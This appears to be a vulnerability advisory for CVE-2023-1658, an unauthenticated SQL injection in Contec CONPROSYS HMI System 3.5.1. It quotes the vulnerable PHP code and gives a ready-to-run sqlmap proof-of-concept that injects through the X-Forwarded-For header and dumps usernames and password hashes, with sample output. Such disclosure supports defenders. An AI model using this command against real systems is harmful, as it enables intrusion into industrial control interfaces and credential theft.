CVE-2023-1658

critical

Description

There is an SQL injection vulnerability in Contec CONPROSYS HMI System (CHS) 3.5.1. An unauthenticated remote attacker can exploit it to enumerate a CHS database. CHS logs login attempts to the dbo.m_user_login table in a PostgreSQL database: from: auth_login.php $v = d5::v(); // get client IP address if ($l != null) { $p = ad(time()); $q = new d5($i, null, null, 'dbo.m_user_login'); try { $q->_a(_S34_, "'" . $o . "','" . $l->l . "','" . $v . "','" . $p . "',true," . ($b ? 'true' : 'false')); It uses the client IP address to fill in the client_ip column in the m_user_login table. The IP address can be taken from an attacker-controlled X-Forwarded-For header: from: CPostgreSQL.php static function v() { if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) return $_SERVER['HTTP_X_FORWARDED_FOR']; if (isset($_SERVER['REMOTE_ADDR'])) return $_SERVER['REMOTE_ADDR']; return ''; } The X-Forwarded-For header is not sanitized, allowing SQL injection via a PostgreSQL INSERT statement: from: CPostgreSQL.php function _a($a, $e) { if ($a == null || $a == '' || $e == null || $e == '') { $this->a = 'Error: Invalid parameter.'; return FALSE; } if ($this->_ == null) { if (!$this->k()) return FALSE; } if ($this->_ == null) { $this->a = 'Error: Not connected.'; return FALSE; } $c = 'insert into ' . $this->f . ' (' . $a . ') values (' . $e . ')'; $_ = FALSE; try { $d = $this->_->prepare($c); $_ = $d->execute(); PoC The following sqlmap command extracts user names and password hashes in the companys.dbo.s_users table: sqlmap -u 'http:///php/login.php' --data='uid=admin&pwd=aaaa&cid=admin&pid=admin&type=admin,user&nname=1&lang=en' –headers="X-Forwarded-For:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa*" --technique=T --level 5 --risk 3 --ignore-code=401 --dbms=PostgreSQL -p 'X-Forwarded-For' --no-cast --drop-set-cookie --dump -D dbo -T s_users -C login_id,login_password [1 entry] +----------+-------------------------------------------------------------------+ | login_id | login_password | +----------+-------------------------------------------------------------------+ | admin | :a0edf1520405d98745153ca965fb376e62b662d1ae4316ab4af3402e44b859f5 | +----------+-------------------------------------------------------------------+

Details

Source: Mitre, NVD

Published: 2023-03-31

Risk Information

CVSS v2

Base Score: 7.5

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Severity: High

CVSS v3

Base Score: 9.8

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Severity: Critical